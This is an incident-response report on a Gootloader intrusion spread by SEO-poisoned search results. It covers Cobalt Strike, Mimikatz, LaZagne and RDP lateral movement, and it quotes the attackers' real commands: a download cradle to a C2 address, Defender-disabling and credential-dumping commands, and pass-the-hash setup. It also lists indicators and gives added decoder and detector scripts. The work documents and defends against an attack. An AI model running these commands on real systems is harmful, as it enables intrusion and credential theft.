SEO Poisoning – A Gootloader Story
May 9, 2022
thedfirreport.com/2022/05/09/seo-poisoning-a-gootloader-story/

In early February 2022, we witnessed an intrusion employing Gootloader (aka GootKit) as the initial access vector. The intrusion lasted two days and comprised discovery, persistence, lateral movement, collection, defense evasion, credential access and command and control activity. During the post-exploitation phase, the threat actors used RDP, WMI, Mimikatz, LaZagne, WMIExec, and SharpHound. The threat actors then used this access to review sensitive documents.

Background

Gootloader was the name assigned to the multi-staged payload distribution by Sophos in March 2021 (https://news.sophos.com/en-us/2021/03/01/gootloader-expands-its-payload-delivery-options/). The threat actors use SEO (search engine optimization) poisoning to push compromised websites hosting malware to the top of the results for certain search queries, such as "what is the difference between a grand agreement and a contract?" or "freddie mac shared driveway agreement?"

When a user searches for one of these phrases and clicks on one of the top results, they land on a forum-looking web page instructing them to download a file, which they then execute by double-clicking it.

You can learn more about Gootloader from these references:
1. https://news.sophos.com/en-us/2021/03/01/gootloader-expands-its-payload-delivery-options/
2. https://www.sentinelone.com/labs/gootloader-initial-access-as-a-service-platform-expands-its-search-for-high-value-targets/
3. https://redcanary.com/threat-detection-report/threats/gootkit/
4. https://news.sophos.com/en-us/2021/08/12/gootloaders-mothership-controls-malicious-content/

The researcher behind the @GootLoaderSites account (https://twitter.com/GootLoaderSites) is doing a great job of providing operational intelligence about the most recent malicious infrastructure. They also contact impacted businesses, monitor for newly created C2 addresses, and make the information public to the community. Thank you!

Case Summary

The intrusion started with a user searching Bing for "Olymplus Plea Agreement?". The user then clicked on the second search result, which led to the download and execution of a malicious JavaScript file (see the video in the Initial Access section).

Upon execution, Gootloader used encoded PowerShell scripts to load Cobalt Strike into memory and to persist on the host using a combination of registry values and a scheduled task. Fifteen minutes after the initial execution, we observed the threat actors using the PowerShell implementation of SharpHound (BloodHound) to discover attack paths in the Active Directory network. The threat actors collected the results and pivoted to another host via a Cobalt Strike PowerShell beacon. After pivoting, they disabled Windows Defender before executing a second Cobalt Strike payload for a different command and control server. Around an hour after the initial infection, the threat actors ran LaZagne (https://github.com/AlessandroZ/LaZagne) to retrieve all saved credentials from the pivoted workstation.

Meanwhile, on the beachhead host, the threat actors ran Mimikatz via PowerShell to extract credentials. With those credentials, the threat actors used RDP from the beachhead host to the already compromised workstation. They then targeted several other workstations with Cobalt Strike beacon executables; however, no further activity was observed on those endpoints beyond the initial lateral movement. The threat actors favored RDP and remote WMI as their preferred methods to interact with the hosts and servers of interest throughout the rest of the intrusion.
After a pause of around four hours, the threat actors enabled Restricted Admin Mode via WMI on a domain controller and logged in using RDP. The threat actors then used LaZagne again on the domain controller to extract more credentials. Our evidence shows that the attackers then began looking for interesting documents on file shares. They opened the documents one by one on the remote host via RDP, focusing on documents with legal and insurance-related content. On the second and final day of the intrusion, the threat actors ran Advanced IP Scanner from the domain controller via the RDP session. Additionally, they inspected the file server and backup server, looking for more interesting data, before leaving the network.

Services

We offer multiple services, including a Threat Feed service that tracks command and control frameworks such as Cobalt Strike, BazarLoader, Covenant, Metasploit, Empire, PoshC2, etc. More information on this service and others can be found at https://thedfirreport.com/services/. We also have artifacts and IOCs available from this case, such as pcaps, memory captures, files, event logs including Sysmon, KAPE packages, and more, under our Security Researcher and Organization services (https://thedfirreport.com/services/ and https://www.patreon.com/thedfirreport).

Timeline

[Figure: "SEO Poisoning - A Gootloader Story" timeline graphic, Day 1. The events recoverable from the graphic are listed below.]

14:43 UTC - Gootloader execution: WScript.exe runs "olympus_plea_agreement 34603.js"; second stage fetched from kakiosk.adsparkdev.com (35.206.117.64:443); Cobalt Strike loaded into memory (146.70.78.43:443)
14:58 UTC - Discovery via BloodHound: Invoke-BloodHound -CollectionMethod All
15:00 UTC - Lateral movement from the beachhead host to Workstation #1 via a remote service (%COMSPEC% /b /c start /b /min powershell -nop -w hidden -encodedcommand JABzAD0A...), and Defender disabled via PowerShell (powershell.exe -nop -w hidden -c Set-MpPreference -DisableRealtimeMonitoring $true); beacon to 146.70.78.43:443
15:30 UTC - Second Cobalt Strike server on Workstation #1: 37.120.198.225:443
15:34 UTC - Antivirus check on the beachhead host: WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List
15:44 UTC - Mimikatz execution on the beachhead workstation: Invoke-Mimikatz
15:48 UTC - LaZagne execution on Workstation #1: ls.exe all -oN -output C:\Users
16:05 UTC - RDP into Workstation #1 from the beachhead host; Restricted Admin Mode enabled via remote WMI prior to the RDP connection (reg add "hklm\system\currentcontrolset\control\lsa" /f /v DisableRestrictedAdmin /t REG_DWORD /d 0); Microsoft Defender scheduled tasks deleted (C:\Windows\system32\schtasks.exe /delete /tn "\Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /F)
16:38 - 17:01 UTC - Lateral movement to three additional user workstations via remote service execution (\\WORKSTATION\ADMIN$\6bb6ca2.exe)
21:34 UTC - RDP into the domain controller from the beachhead; Restricted Admin Mode enabled via remote WMI prior to the RDP connection (Invoke-WMIExec -Target DomainController -Domain domain.local -Username USER -Hash **** -Command "powershell.exe reg add 'hklm\system\currentcontrolset\control\lsa' /f /v DisableRestrictedAdmin /t REG_DWORD /d 0" -verbose)
21:49 UTC - RDP into the file share server from the beachhead; Restricted Admin Mode enabled via remote WMI prior to the RDP connection

Analysis and reporting completed by @kostastsale (https://twitter.com/Kostastsale), @iiamaleks (https://twitter.com/iiamaleks) and @pigerlin (https://twitter.com/pigerlin).

Initial Access

The threat actor gained initial access using Gootloader malware. Here is a video of the user searching for and downloading the malware via the poisoned search result.
Watch the video at: https://youtu.be/IdR-tlv7w48

The JavaScript file is executed when the user double-clicks it after opening the zip archive.

Execution

Upon execution, Gootloader creates two registry values:

HKCU:\SOFTWARE\Microsoft\Phone\Username
HKCU:\SOFTWARE\Microsoft\Phone\Username0

The first is populated with an encoded Cobalt Strike payload and the second stores a .NET loader named powershell.dll. ("Username" here stands for the name of the logged-on user, which the scripts below obtain from [Environment]::UserName.)

Following the registry events, a PowerShell command was launched with an encoded command:

"powershell.exe" /c C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "/"e" NgAxA"DQANgA0ADkA"MgAxADEAOwB"zAGwAZQBlAHAAIAAtAHMAIAA4AD"MA"OwAkAG8AcABqAD0ARwBlAH"QA

The PowerShell command extracts the .NET loader from HKCU:\SOFTWARE\Microsoft\Phone\Username0 and executes it in memory via Assembly.Load():

614649211; sleep -s 83; $opj=Get-ItemProperty -path ("hkcu:\software\microsoft\Phone\"+[Environment]::("username")+"0"); for ($uo=0;$uo -le 760;$uo++) { Try{$mpd+=$opj.$uo}Catch{} }; $uo=0; while($true) { $uo++;$ko=[math]::("sqrt")($uo); if($ko -eq 1000){break} } $yl=$mpd.replace("#",$ko); $kjb=[byte[]]::("new")($yl.Length/2); for($uo=0;$uo -lt $yl.Length;$uo+=2){ $kjb[$uo/2]=[convert]::("ToByte")($yl.Substring($uo,2),(2*8)) } [reflection.assembly]::("Load")($kjb); [Open]::("Test")(); 6118985

In other words: the loader is stored across numbered values 0 to 760 under the Username0 key (missing values are silently skipped by the Try/Catch), which are concatenated; every "#" in the result is replaced by "1000" (the value $ko has when the sqrt loop breaks); the resulting hex string is converted to bytes, loaded as an assembly, and its Open.Test() entry point is called. This CyberChef recipe can be used to decode the related encoded PowerShell payload: https://github.com/The-DFIR-Report/cyberchef-recipes/blob/main/SEO%20Poisoning%20-%20A%20GootLoader%20Story

Once the PowerShell script has finished, the next stage is the .NET loader. The .NET loader reads HKCU:\SOFTWARE\Microsoft\Phone\Username and extracts the encoded Cobalt Strike payload, which it decodes and loads into memory for execution.

A simple substitution scheme is used where each letter corresponds to one of the hex digits (0-F) or, alternately, to three zeros:

q -> 000
v -> 0
w -> 1
r -> 2
t -> 3
y -> 4
u -> 5
i -> 6
o -> 7
p -> 8
s -> 9
q -> A
h -> B
j -> C
k -> D
l -> E
z -> F

The source code responsible for the core logic of the .NET loader, and a diagram summarizing the Gootloader initial execution, are shown as images in the original post.

An excellent resource from Microsoft describes attack surface reduction rules, including "Block JavaScript or VBScript from launching downloaded executable content", that can stop this attack chain from ever getting off the ground: https://docs.microsoft.com/en-us/microsoft-365/security/defender-endpoint/attack-surface-reduction-rules-reference?view=o365-worldwide#block-javascript-or-vbscript-from-launching-downloaded-executable-content

During later stages of the intrusion, Cobalt Strike was executed interactively through RDP on multiple systems:

powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('hxxp://37.120.198.225:80/trio'))"

Persistence

The JavaScript (Gootloader) file invoked an encoded PowerShell command. That command creates a scheduled task that runs when the infected user logs on to the computer; the task in turn executes an encoded PowerShell command that retrieves and executes the payload stored in the registry.
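The two registry decoding steps described in the Execution section above (the PowerShell stage that rebuilds the .NET loader from the numbered Username0 values, and the letter substitution the loader applies to the Username value), re-implemented in Python as an added example for decoding exported registry values offline. This is not code from the report or from the malware. The sample registry contents are constructed; and because the table above lists q for both "000" and "A", the example keeps the first entry and treats the letter for hex digit A as unknown (an assumption), so the constructed sample avoids that nibble.

```python
"""Added example: offline re-implementation of Gootloader's two registry
decoding stages as described in the report (not the report's own code).

Stage 1 mirrors the PowerShell one-liner: join the numbered values 0..760
under HKCU\Software\Microsoft\Phone\<user>0, replace '#' with '1000' (the
value $ko reaches when sqrt($uo) == 1000), hex-decode -> .NET loader.

Stage 2 mirrors the .NET loader's letter substitution for the value under
HKCU\Software\Microsoft\Phone\<user>. ASSUMPTION: the report's table lists
'q' twice; the first entry ('000') is kept and hex digit A has no letter.
"""
import re

# Letter -> hex-digit table as printed in the report (duplicate 'q' dropped).
STAGE2_TABLE = {
    "q": "000", "v": "0", "w": "1", "r": "2", "t": "3", "y": "4", "u": "5",
    "i": "6", "o": "7", "p": "8", "s": "9", "h": "B", "j": "C", "k": "D",
    "l": "E", "z": "F",
}


def reassemble_chunks(values: dict, last: int = 760) -> str:
    """Join the numbered registry values the way the PowerShell loop does:
    try names "0".."760" in order and silently skip the ones that are missing."""
    return "".join(values.get(str(i), "") for i in range(last + 1))


def stage1_decode(joined: str) -> bytes:
    """'#' -> '1000', then pairs of hex digits -> bytes (the .NET loader)."""
    hexstr = joined.replace("#", "1000")
    if len(hexstr) % 2 or not re.fullmatch(r"[0-9A-Fa-f]*", hexstr):
        raise ValueError("stage 1 payload is not a clean hex string")
    return bytes.fromhex(hexstr)


def stage2_decode(encoded: str, table: dict = STAGE2_TABLE) -> bytes:
    """Letter substitution -> hex string -> bytes (the Cobalt Strike stage).
    Unknown characters raise instead of being dropped, so a sample using a
    changed table is noticed rather than silently producing garbage."""
    out = []
    for ch in encoded:
        if ch not in table:
            raise ValueError(f"no mapping for {ch!r}; table may have changed")
        out.append(table[ch])
    hexstr = "".join(out)
    if len(hexstr) % 2:
        raise ValueError("decoded hex string has odd length")
    return bytes.fromhex(hexstr)


def looks_like_pe(blob: bytes) -> bool:
    """Cheap sanity check on a decoded stage: PE images start with 'MZ'."""
    return blob[:2] == b"MZ"


# Constructed sample values (NOT real Gootloader data): an 'MZ' header and
# zero runs written as '#', split over numbered values with "2" missing.
SAMPLE_STAGE1 = {"0": "4D5A#", "1": "#4D", "3": "5A#"}
# Constructed stage-2 text for bytes 4D 50 00 00 (no hex digit A needed).
SAMPLE_STAGE2 = "ykuvqv"

if __name__ == "__main__":
    loader = stage1_decode(reassemble_chunks(SAMPLE_STAGE1))
    print("stage1:", loader.hex(), "PE header:", looks_like_pe(loader))
    print("stage2:", stage2_decode(SAMPLE_STAGE2).hex())
```

To use it on a real case, export the two values (for example with `reg export` or from a registry hive parsed by a forensic tool) into the dictionary shape used by `SAMPLE_STAGE1`, run stage 1, and confirm the output starts with "MZ" before feeding it to a .NET decompiler; if stage 2 raises on an unknown letter, the variant has changed its table and the decompiled loader is where to read the new one.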
6876813; $a="NgAxADQANgA0ADkAMgAxADEAOwBzAGwAZQBlAHAAIAAtAHMAIAA4ADMAOwAkAG8AcABqAD0ARwBlAHQALQ $u=$env:USERNAME; Register-ScheduledTask $u -In (New-ScheduledTask -Ac (New-ScheduledTaskAction -E ([Diagnostics.Process]::GetCurrentProcess().MainModule.FileName) -Ar ("-w h -e "+$a)) -Tr (New-ScheduledTaskTrigger -AtL -U $u)); 30687851

Decoded PowerShell payload (with the $a string expanded):

6876813; 614649211; $a = "614649211"; sleep -s 83; $opj = Get-ItemProperty -path ("hkcu:\software\microsoft\Phone\" + [Environment]::("username") + "0"); for ($uo = 0; $uo -le 760; $uo++) { Try { $mpd += $opj.$uo } Catch {} }; $uo = 0; while ($true) { $uo++; $ko = [math]::("sqrt")($uo); if ($ko -eq 1000) { break } } $yl = $mpd.replace("#", $ko); $kjb = [byte[]]::("new")($yl.Length / 2); for ($uo = 0; $uo -lt $yl.Length; $uo += 2) { $kjb[$uo / 2] = [convert]::("ToByte")($yl.Substring($uo, 2), (2 * 8)) } [reflection.assembly]::("Load")($kjb); [Open]::("Test")(); 611898544; $u = $env:USERNAME; Register-ScheduledTask $u -In (New-ScheduledTask -Ac (New-ScheduledTaskAction -E ([Diagnostics.Process]::GetCurrentProcess().MainModule.FileName) -Ar ("-w h -e " + $a)) -Tr (New-ScheduledTaskTrigger -AtL -U $u)); 306878516;

The task created by the script is shown in the original post: it is named after the current user, triggered at that user's logon (-AtLogOn), and runs the same PowerShell binary that created it (MainModule.FileName) with the arguments "-w h -e <encoded command>", so every logon re-runs the registry-stored loader.

Defense Evasion

Windows Defender scheduled scans were deleted from the system. This was observed on multiple servers the threat actor pivoted to.
schtasks /delete /tn "\Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /f
schtasks /delete /tn "\Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /f
schtasks /delete /tn "\Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /f
schtasks /delete /tn "\Microsoft\Windows\Windows Defender\Windows Defender Verification" /f

Furthermore, PowerShell was used to disable multiple security features built into Microsoft Defender:

Set-MpPreference -DisableRealtimeMonitoring $true
Set-MpPreference -DisableArchiveScanning $true
Set-MpPreference -DisableBehaviorMonitoring $true
Set-MpPreference -DisableIOAVProtection $true
Set-MpPreference -DisableIntrusionPreventionSystem $true
Set-MpPreference -DisableScanningNetworkFiles $true
Set-MpPreference -MAPSReporting 0
Set-MpPreference -DisableCatchupFullScan $True
Set-MpPreference -DisableCatchupQuickScan $True

As in many cases involving Cobalt Strike, we observed rundll32 used to load the Cobalt Strike beacons into memory on the beachhead host. This can be observed in the memory dump from the beachhead host: the injected regions carry the tell-tale PAGE_EXECUTE_READWRITE protection, and MZ headers are visible in the process memory space (see the images in the original post).

During the intrusion we observed various named pipes used by the threat actor's Cobalt Strike beacons, including default Cobalt Strike named pipes:

PipeName: \msagent_ld
PipeName: \1ea887

The threat actors were observed making use of double-encoded PowerShell commands. The first layer of encoding combines hexadecimal and XOR encoding; the second layer is a Base64-encoded string that decodes to Gzip-compressed data. Decoding this script reveals that it is the publicly available Invoke-WMIExec script (https://github.com/Kevin-Robertson/Invoke-TheHash/blob/master/Invoke-WMIExec.ps1) for running commands through remote WMI.

Credential Access

The malicious PowerShell process used by Gootloader dropped a PowerShell script named "mi.ps1" on the file system. Another PowerShell command was used to trigger the mi.ps1 script. That command was XOR-encoded:

powershell -nop -noni -ep bypass -w h -c ""$t=([type]'Convert');& ([scriptblock]::Create(($t::(($t.GetMethods()|?{$_.Name-clike'F*g'}).Name) ('NWYsOV90Zjxec3t0cmUxX3RlP0Z0c1J9eHR/ZTgqNWQsNWY/OTk5OTVmOD9BYl5ze3RyZT9cdGV5fnViOG0u {$_-bxor17}|%{[char]$_})-join''))""

The construct $t::(($t.GetMethods()|?{$_.Name -clike 'F*g'}).Name) resolves, on .NET Framework, to [Convert]::FromBase64String without the method name ever appearing on the command line; each decoded byte is then XORed with 17 (0x11) and cast to a char, and the result is passed to a script block. This CyberChef recipe can be used to decode the inner encoded command: https://github.com/The-DFIR-Report/cyberchef-recipes/blob/main/SEO%20Poisoning%20-%20A%20GootLoader%20Story

The output lists "Invoke-Mimikatz", a direct reference to the PowerShell Invoke-Mimikatz.ps1 script used to load the Mimikatz DLL directly in memory:

$u=('http://127.0.0.1:22201/'|%{(IRM $_)});$u|&(GCM I*e-E*); Import-Module C:\Users\ \mi.ps1; Invoke-Mimikatz -ComputerName

Here GCM I*e-E* resolves Invoke-Expression by wildcard, and the script is fetched from a high port on 127.0.0.1, which is how Cobalt Strike's powershell-import serves an imported script to the PowerShell process spawned by the beacon.

Monitoring PowerShell event ID 4103 (module logging), we can observe the threat actor's successful credential access activity from the Mimikatz invocation.

In addition, the post-exploitation tool LaZagne (https://github.com/AlessandroZ/LaZagne), renamed to ls.exe, was used with the "all" switch:

ls.exe all -oN -output C:\Users\REDACTED

This dumps passwords from browsers, LSA secrets, hashdump, KeePass, WinSCP, RDPManager, OpenVPN, Git, etc., and stores the output file (in our case) in the "C:\Users" directory.
When LaZagne is run with admin privileges, it also attempts to dump credentials from the local registry hives, as seen below. Here are the commands from another system:

cmd.exe /c "reg.exe save hklm\sam c:\users\REDACTED\appdata\local\temp\1\dznuxujzr"
cmd.exe /c "reg.exe save hklm\system c:\users\REDACTED\appdata\local\temp\1\mkffdg"
cmd.exe /c "reg.exe save hklm\security c:\users\REDACTED\appdata\local\temp\1\iszmqwmjemt"

Discovery

The threat actors used the PowerShell implementation of SharpHound (BloodHound) on the beachhead host to enumerate the Active Directory domain. The Cobalt Strike beacon was used to invoke the PowerShell script:

powershell -nop -exec bypass -EncodedCommand SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBEAG

(The visible part of the encoded command decodes to "IEX (New-Object Net.Webclient).D", i.e. a download cradle that fetches the script.)

They also ran a WMI command on the beachhead host and one other host to check for antivirus products:

WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List

The threat actors executed this command remotely on a domain controller, before moving laterally to it:

powershell.exe ls C:\ > C:\file.txt

During an interactive RDP session, the attackers used PowerShell to run systeminfo on one of the hosts they pivoted to in order to collect more information about it. On the last day, before leaving the network, the threat actors used Advanced IP Scanner to scan the whole network for the following open ports:

21,80,135,443,445,3389,8080,56133,58000,58157,58294,58682,60234,60461,64502

Lateral Movement

As observed in many of our intrusions, the threat actor created and installed Windows services to deploy Cobalt Strike beacons. This method was used to pivot to other systems within the network.

SMB was also used to transfer executable Cobalt Strike beacons to various workstations in the environment. These executables were then run by a remote service, visible as Windows event ID 7045 (a new service was installed) in the System log.

Besides deploying Cobalt Strike beacons, the threat actor also used RDP to establish interactive sessions with various hosts on the network. One important aspect of these sessions is that the threat actor authenticated using "Restricted Admin Mode".

Restricted Admin Mode can be considered a double-edged sword: although it prevents credential theft on the remote host (the user's credentials are never sent to it), it also enables an attacker to perform a pass-the-hash attack over RDP. In other words, once Restricted Admin Mode is enabled, only the NTLM hash of the remote desktop user is required to establish a valid RDP session, without possessing the cleartext password. The switch is the DisableRestrictedAdmin value under HKLM\System\CurrentControlSet\Control\Lsa; a value of 0 enables the mode, and the threat actor set it to 0 on each target remotely before connecting over RDP.

The threat actor attempted to use both Invoke-WMIExec and psexec to enable Restricted Admin Mode (target, user and password are redacted):

psexec \\ -u \ -p reg add "hklm\system\currentcontrolset\control\lsa" /f /v DisableRestrictedAdmin /t REG_DWORD /d 0

powershell -nop -noni -ep bypass -w h -c "$u=('http://127.0.0.1:47961/'|%%{(IRM $_)});&(''.SubString.ToString()[67,72,64]-Join'')($u); Import-Module C:\Users\ \Invoke-WMIExec.ps1; Invoke-WMIExec -Target -Domain -Username -Hash -Command "powershell.exe New-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Lsa' -Name 'DisableRestrictedAdmin' -Value 0 -PropertyType DWORD" -verbose"

In the second command, ''.SubString.ToString()[67,72,64]-Join'' picks the characters "i", "e" and "x" out of the overload-definition string that ''.SubString.ToString() returns, yielding Invoke-Expression without the cmdlet name appearing on the command line.

The logon information in event ID 4624 includes a field "Restricted Admin Mode", which is set to "Yes" when the feature is used. The event recorded for the RDP logon (Logon Type 10, RemoteInteractive) reads as follows (redacted):

LogName=Security
EventCode=4624
EventType=8
SourceName=Microsoft Windows security auditing.
Type=Information
RecordNumber=31774
Keywords=Audit Success
TaskCategory=Logon
OpCode=Info
Message=An account was successfully logged on.

Subject:
  Security ID: S-1-5-18
  Account Name: <redacted>
  Account Domain: <redacted>
  Logon ID: 0x3E7

Logon Information:
  Logon Type: 10
  Restricted Admin Mode: Yes
  Virtual Account: No
  Elevated Token: Yes

Impersonation Level: Impersonation

New Logon:
  Security ID: <redacted>
  Account Name: <redacted>
  Account Domain: <redacted>
  Logon ID: <redacted>
  Linked Logon ID: 0x0
  Network Account Name: -
  Network Account Domain: -
  Logon GUID: {00000000-0000-0000-0000-000000000000}

Process Information:
  Process ID: 0x3fc
  Process Name: C:\Windows\System32\svchost.exe

Network Information:
  Workstation Name: -
  Source Network Address: <redacted>
  Source Port: 0

Detailed Authentication Information:
  Logon Process: User32

Collection

The threat actor accessed multiple files during the RDP sessions on multiple servers. In one instance, document files were opened directly on the system. Shellbags revealed attempts to enumerate multiple file shares containing information of interest to the threat actor.

Command and Control

Gootloader

Gootloader second-stage download URLs. These URLs were deobfuscated and extracted using this script by HP Threat Research: https://github.com/hpthreatresearch/tools/blob/main/gootloader/decode.py. They have updated this script several times; thanks to @hpsecurity (https://twitter.com/HPSecurity) and to @GootLoaderSites for sharing on Twitter as it breaks and gets fixed.

hxxps://kakiosk.adsparkdev[.]com/test.php?hjkiofilihyl=
hxxps://jp.imonitorsoft[.]com/test.php?hjkiofilihyl=
hxxps://junk-bros[.]com/test.php?hjkiofilihyl=

During the intrusion the Gootloader loader was observed communicating with 35.206.117.64:443 (kakiosk[.]adsparkdev[.]com).
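The three host-side behaviours above (Defender scheduled tasks deleted and Defender features switched off in the Defense Evasion section, and DisableRestrictedAdmin set to 0 followed by a Restricted Admin Mode RDP logon in this section) as detection logic run over sample records, added here as an example and not taken from the report or its Sigma rules. The records are constructed for the example; their field names follow Sysmon event 1 and Windows event 4624, but they are not real telemetry.

```python
"""Added example: small detector for the Defender-tampering and Restricted
Admin Mode chain described in the report, run over constructed sample records
(not real logs, not the report's Sigma rules)."""
import re
from typing import Dict, List, Tuple

# schtasks /delete of anything under \Microsoft\Windows\Windows Defender\
DEFENDER_TASK_DELETE = re.compile(
    r'schtasks(?:\.exe)?"?\s+/delete\s+/tn\s+"?\\Microsoft\\Windows\\Windows Defender\\', re.I)
# Set-MpPreference -Disable<Feature> $true or -MAPSReporting 0
DEFENDER_DISABLE = re.compile(
    r"Set-MpPreference\s+.*?-(?:Disable\w+\s+\$true|MAPSReporting\s+0)", re.I)
# reg add / New-ItemProperty on ...\Control\Lsa DisableRestrictedAdmin = 0
RESTRICTED_ADMIN_ON = re.compile(
    r"Control\\Lsa.*?DisableRestrictedAdmin.*?(?:/d\s+0\b|-Value\s+0\b)", re.I | re.S)


def classify_cmdline(cmdline: str) -> List[str]:
    """Tags for one process-creation command line (empty list = nothing seen)."""
    tags = []
    if DEFENDER_TASK_DELETE.search(cmdline):
        tags.append("defender_task_deleted")
    if DEFENDER_DISABLE.search(cmdline):
        tags.append("defender_feature_disabled")
    if RESTRICTED_ADMIN_ON.search(cmdline):
        tags.append("restricted_admin_enabled")
    return tags


def is_restricted_admin_rdp(event: Dict) -> bool:
    """4624 with a RemoteInteractive logon (type 10) and Restricted Admin Mode: Yes."""
    return (event.get("EventCode") == 4624
            and event.get("LogonType") == 10
            and str(event.get("RestrictedAdminMode", "")).lower() == "yes")


def run_detections(process_events: List[Dict], logon_events: List[Dict]) -> List[Tuple[str, str, str]]:
    """Return (host, tag, evidence) triples over both record types."""
    findings = []
    for ev in process_events:
        for tag in classify_cmdline(ev["cmd"]):
            findings.append((ev["host"], tag, ev["cmd"]))
    for ev in logon_events:
        if is_restricted_admin_rdp(ev):
            findings.append((ev["Computer"], "restricted_admin_rdp_logon", ev["Source"]))
    return findings


def restricted_admin_chains(findings: List[Tuple[str, str, str]]) -> List[str]:
    """Hosts where the mode was switched on AND a Restricted Admin RDP logon
    followed: the exact sequence the threat actor used against the DC here."""
    enabled = {h for h, tag, _ in findings if tag == "restricted_admin_enabled"}
    return sorted({h for h, tag, _ in findings
                   if tag == "restricted_admin_rdp_logon" and h in enabled})


# Constructed sample records (hostnames and addresses are invented).
SAMPLE_PROCESS_EVENTS = [
    {"host": "WS1", "cmd": r'schtasks /delete /tn "\Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /f'},
    {"host": "WS1", "cmd": "powershell.exe -nop -w hidden -c Set-MpPreference -DisableRealtimeMonitoring $true"},
    {"host": "DC1", "cmd": r'reg add "hklm\system\currentcontrolset\control\lsa" /f /v DisableRestrictedAdmin /t REG_DWORD /d 0'},
    {"host": "WS2", "cmd": "powershell.exe Get-MpPreference"},                       # benign
    {"host": "WS2", "cmd": r'schtasks /create /tn "\MyBackup" /tr backup.exe /sc daily'},  # benign
]
SAMPLE_LOGON_EVENTS = [
    {"EventCode": 4624, "LogonType": 10, "RestrictedAdminMode": "Yes", "Computer": "DC1", "Source": "10.0.0.5"},
    {"EventCode": 4624, "LogonType": 10, "RestrictedAdminMode": "No", "Computer": "FS1", "Source": "10.0.0.7"},
    {"EventCode": 4624, "LogonType": 3, "RestrictedAdminMode": "-", "Computer": "FS1", "Source": "10.0.0.5"},
]

if __name__ == "__main__":
    found = run_detections(SAMPLE_PROCESS_EVENTS, SAMPLE_LOGON_EVENTS)
    for host, tag, evidence in found:
        print(f"{host:4} {tag:28} {evidence}")
    print("restricted-admin chains:", restricted_admin_chains(found))
```

The registry change is executed on the target (here via remote WMI), so the process-creation event lands on the host that is about to receive the RDP session; correlating it with the later 4624 on the same host is what turns two medium-confidence signals into a high-confidence one.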
Gootloader server TLS details (kakiosk.adsparkdev.com, 35.206.117.64:443):

Ja3: a0e9f5d64349fb13191bc781f81f42e1
Ja3s: 567bb420d39046dbfd1f68b558d86382
Certificate: d8:85:d1:48:a2:99:f5:ee:9d:a4:3e:01:1c:b0:ec:12:e5:23:7d:61
Not Before: 2022/01/05 09:25:33 UTC
Not After: 2022/04/05 09:25:32 UTC
Issuer Org: Let's Encrypt
Subject Common: kakiosk.adsparkdev.com [kakiosk.adsparkdev.com, www.kakiosk.adsparkdev.com]
Public Algorithm: rsaEncryption

Cobalt Strike

146.70.78.43 Cobalt Strike server TLS configuration:

Ja3: 72a589da586844d7f0818ce684948eea
Ja3s: f176ba63b4d68e576b5ba345bec2c7b7
Serial Number: 146473198 (0x8bb00ee)
Certificate: 73:6B:5E:DB:CF:C9:19:1D:5B:D0:1F:8C:E3:AB:56:38:18:9F:02:4F
Not Before: May 20 18:26:24 2015 GMT
Not After: May 17 18:26:24 2025 GMT
Issuer: C=, ST=, L=, O=, OU=, CN=
Subject: C=, ST=, L=, O=, OU=, CN=
Public Algorithm: rsaEncryption

Both Cobalt Strike servers present this same empty-subject certificate with serial 146473198, which is the default certificate shipped with Cobalt Strike; it is what the ET "Suspicious Empty SSL Certificate - Observed in Cobalt Strike" signature listed under Detections matches.

Cobalt Strike beacon configuration (146.70.78.43):

x86:
beacon_type: HTTPS
dns-beacon.strategy_fail_seconds: -1
dns-beacon.strategy_fail_x: -1
dns-beacon.strategy_rotate_seconds: -1
http-get.client: Cookie
http-get.uri: 146.70.78.43,/visit.js
http-get.verb: GET
http-post.client: Content-Type: application/octet-stream id
http-post.uri: /submit.php
http-post.verb: POST
maxgetsize: 1048576
port: 443
post-ex.spawnto_x64: %windir%\sysnative\rundll32.exe
post-ex.spawnto_x86: %windir%\syswow64\rundll32.exe
process-inject.execute: CreateThread SetThreadContext CreateRemoteThread RtlCreateUserThread
process-inject.startrwx: 64
process-inject.stub: 222b8f27dbdfba8ddd559eeca27ea648
process-inject.userwx: 64
proxy.behavior: 2 (Use IE settings)
server.publickey_md5: defb5d95ce99e1ebbf421a1a38d9cb64
sleeptime: 60000
useragent_header: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; yie9)
uses_cookies: 1
watermark: 1580103824

x64:
beacon_type: HTTPS
dns-beacon.strategy_fail_seconds: -1
dns-beacon.strategy_fail_x: -1
dns-beacon.strategy_rotate_seconds: -1
http-get.client: Cookie
http-get.uri: 146.70.78.43,/fwlink
http-get.verb: GET
http-post.client: Content-Type: application/octet-stream id
http-post.uri: /submit.php
http-post.verb: POST
maxgetsize: 1048576
port: 443
post-ex.spawnto_x64: %windir%\sysnative\rundll32.exe
post-ex.spawnto_x86: %windir%\syswow64\rundll32.exe
process-inject.execute: CreateThread SetThreadContext CreateRemoteThread RtlCreateUserThread
process-inject.startrwx: 64
process-inject.stub: 222b8f27dbdfba8ddd559eeca27ea648
process-inject.userwx: 64
proxy.behavior: 2 (Use IE settings)
server.publickey_md5: defb5d95ce99e1ebbf421a1a38d9cb64
sleeptime: 60000
useragent_header: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENXA)
uses_cookies: 1
watermark: 1580103824

37.120.198.225 Cobalt Strike server TLS configuration:

Ja3: 72a589da586844d7f0818ce684948eea
Ja3s: f176ba63b4d68e576b5ba345bec2c7b7
Serial Number: 146473198 (0x8bb00ee)
Certificate: 73:6B:5E:DB:CF:C9:19:1D:5B:D0:1F:8C:E3:AB:56:38:18:9F:02:4F
Not Before: May 20 18:26:24 2015 GMT
Not After: May 17 18:26:24 2025 GMT
Issuer: C=, ST=, L=, O=, OU=, CN=
Subject: C=, ST=, L=, O=, OU=, CN=
Public Algorithm: rsaEncryption

Cobalt Strike beacon configuration (37.120.198.225):

